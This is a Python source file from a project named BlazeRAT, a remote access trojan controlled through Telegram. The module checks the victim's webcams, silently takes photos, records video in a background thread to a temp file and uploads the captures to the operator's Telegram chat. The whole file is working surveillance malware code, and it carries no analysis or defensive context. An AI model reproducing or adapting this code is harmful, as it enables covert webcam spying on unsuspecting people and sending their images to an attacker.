123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152 |
- from io import BytesIO
- from core.logger import Log
- from os import path, remove
- from threading import Thread
- from tempfile import gettempdir
- from core.messages import services as Messages
- from cv2 import VideoCapture, VideoWriter, VideoWriter_fourcc,\
- flip, imencode
- """
- Author : LimerBoy
- github.com/LimerBoy/BlazeRAT
- Notes :
- The file is needed
- to create photos and videos from the webcam
- """
- global file, r, t, camera, output
- r, t, camera, output = False, None, None, None
- file = path.join(gettempdir(), "webcamera.avi")
- """ Check camera by index """
- def _CheckCamera(device: int = 0) -> bool:
- camera = VideoCapture(device)
- status = camera.isOpened()
- camera.release()
- return status
- """ Capture image """
- def _CaptureImage(device: int = 0) -> bytes:
-
- camera = VideoCapture(device)
-
- if not camera.isOpened():
- return False
-
- for _ in range(15):
- _, image = camera.read()
-
- camera.release()
- del(camera)
-
- _, buffer = imencode(".jpg", image)
- obj = BytesIO(buffer)
- return obj.getvalue()
- """ Capture video from camera """
- def _CaptureVideo(device: int = 0) -> None:
-
- global r, camera, output, file
- r = True
- camera = VideoCapture(device)
- fourcc = VideoWriter_fourcc(*"XVID")
- output = VideoWriter(file, fourcc, 20.0, (640,480))
-
- while (r and camera.isOpened()):
- res, frame = camera.read()
- if res:
- frame = flip(frame, 0)
- output.write(frame)
- else:
- break
- """ Asynchronously capture video from camera """
- def _StartAsync(device: int = 0) -> None:
- global r, t
- if r: return False
- try:
- t = Thread(target=_CaptureVideo, args=(device,))
- t.start()
- except Exception as error:
- print(error)
- r = False
- else:
- return True
- """ Stop webcam capture """
- def _Stop() -> bytes:
- global r, t, camera, output, file
- if not r: return False
- r = False
- t.join()
-
- camera.release()
- output.release()
-
- content = open(file, "rb")
- remove(file)
- return content
- """ Handle telegram command """
- def Handle(callback: dict, bot) -> None:
- text = callback.data
- chatid = callback.from_user.id
- device = 0
-
- if "_" in text:
- device = int(text.split('_')[-1])
-
- if "Screenshot" in text:
- bot.send_chat_action(chatid, "upload_photo")
-
- if not _CheckCamera(device):
- return bot.send_message(chatid, Messages.webcam_failed_open % device)
-
- Log(f"Webcam >> Create screenshot from device {device}", chatid)
-
- screenshot = _CaptureImage(device)
- if screenshot != False:
- bot.send_photo(chatid,
- photo=screenshot,
- caption=Messages.webcam_screenshot_captured,
- )
-
- else:
- bot.send_message(chatid, Messages.webcam_failed_open % device)
-
- if "Enable" in text:
-
- if not _CheckCamera(device):
- return bot.send_message(chatid, Messages.webcam_failed_open % device)
-
- Log(f"Webcam >> Start video recording from device {device}", chatid)
-
- video = _StartAsync(device)
- if video != False:
- bot.send_message(chatid, Messages.webcam_recording_started)
- bot.send_chat_action(chatid, "record_video")
-
- else:
- bot.send_message(chatid, Messages.webcam_recording_not_stopped)
-
- elif "Disable" in text:
-
- video = _Stop()
- if video != False:
- Log(f"Webcam >> Stop video recording from device {device}", chatid)
- bot.send_chat_action(chatid, "upload_video")
- bot.send_video_note(
- chatid, video,
- reply_to_message_id=callback.message.message_id,
- )
- bot.send_message(chatid, Messages.webcam_recording_stopped)
-
- else:
- bot.send_message(chatid, Messages.webcam_recording_not_started)
|